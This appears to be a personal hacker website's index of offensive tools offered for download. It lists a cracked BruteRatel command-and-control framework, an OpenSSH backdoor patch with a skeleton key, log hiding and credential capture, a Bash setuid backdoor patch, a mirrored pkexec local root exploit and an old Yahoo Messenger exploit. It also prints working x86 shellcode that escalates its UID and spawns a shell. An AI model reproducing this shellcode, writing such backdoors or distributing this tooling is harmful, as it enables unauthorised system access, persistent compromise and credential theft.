|
Recent Misc
|
■ |
Remember Wargames of the 2000 era?
Play here. There are a series of levels (4 as of writing) that will lead you to being able to get root on a server. Every level will have clues to help you with the next. Have fun!
|
■ |
Post Exploitation Framework
BruteRatel-1.2.2-Cracked.zip is a customised command and control center for Red Team and Adversary Simulation. Documentation is here.
|
■ |
IPS
Grepinator is a firewall wrapper for ipset and iptables that uses pre-defined filters to comb through log files and match on patterns that may indicate an attempt at hacking, brute-forcing or enumeration of a server.
|
■ |
Backdoor
OpenSSH-8.4-backdoor.patch is a patch I wrote for the most recent version of OpenSSH (8.4 Portable as of writing). This patch adds a hardcoded skeleton key to the ssh daemon. A few bonuses include:
No connection traces in the log files
Usernames and passwords both in and out are logged - currently not enabled
PAM bypass
Security through obscurity? Logging of usernames and passwords can be routed to /dev/null when deemed an invasion of privacy. Alternatively, use it to recover passwords of a compromised system.
|
■ |
Shellcode
set-loop.c - will find the highest UID to setuid(). Most services will run as non-root, so something generic was called for.
char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
"\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
"\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";
|
■ |
Script
Obfuscator is a bash script obfuscator. Obfuscation (or beclouding) is the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret. Anyone with half a brain cell can reverse this obfuscation, but it was better than plaintext for its intended purpose.
|
■ |
OLD Wargames
BishII was one of the first multi-shellcode & multi-platform eggshell loaders back in the mid-2000s.
|
■ |
Exploit (golden oldie)
YahPoo.c was an exploit I wrote for a vulnerability I found in the Yahoo Messenger Windows application over a decade ago. This was the first exploit I sold to Verisign (formerly iDefense).
This vulnerability affected MILLIONS of Yahoo Messenger clients worldwide and, with the right shellcode, allowed an attacker to install a backdoor on any Windows machine of that era (XP/2k).
|
■ |
Backdoor
Bash-4.2.patch
is a patch to chmod a 'file' 4775 should a certain 'condition' exist.
This tool/backdoor was used to regain root access in a King of the hill style wargame. See patch for more info.
|
■ |
Documents
A bit of light reading...
|
■ |
Mirror
blasty-vs-pkexec.c Download the Local root exploit - mirrored - Original can be found at https://haxx.in
|